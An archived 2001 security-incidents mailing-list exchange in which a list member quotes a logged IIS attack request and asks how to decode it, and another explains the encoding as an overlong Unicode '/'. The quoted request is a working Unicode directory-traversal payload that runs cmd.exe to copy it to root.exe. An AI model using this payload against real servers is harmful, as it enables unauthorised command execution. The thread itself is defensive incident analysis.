Jason, It's just one of the Extended Unicode representations of the '/' character. I haven't seen many translation tables for Extended Unicode values, but it looks like there are probably some at http://www.unicode.org/charts. Hope this helps, Reverend Lola The Titanium Sheep Provider of Steel Wool Defender of the Fleeceless > -----Original Message----- > From: jason [mailto:jpotopaat_private] > Sent: Monday, June 25, 2001 10:38 AM > To: incidentsat_private > Subject: Unicode Decode > > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Does anyone know of any sites/tools/tables to decode > unicode > information? Specificly I am looking to decode the > unicode portion > of this attack: > > GET > /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/sytem32/cmd.exe > ?/c+copy+\winnt\system32\cmd.exe +root.exe HTTP/1.0 > > Obviously he is trying to copy cmd.exe to > /msadc/root.exe, but I do > not know how to interpret the unicode stuff. Thanks > in advance > > -----BEGIN PGP SIGNATURE----- > Version: PGPfreeware 6.5.3 for non-commercial use > <http://www.pgp.com> > > iQA/AwUBOzd3ClL3u0OElmjPEQLyWgCfTM0mvmVcZpgQjOZwHSaddHGxgUAAoIrU > v3cHdcY94clFmG92/O4ojvpd > =gtF9 > -----END PGP SIGNATURE----- > > __________________________________________________ Do You Yahoo!? Get personalized email addresses from Yahoo! Mail http://personal.mail.yahoo.com/ This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Jun 26 2001 - 10:36:11 PDT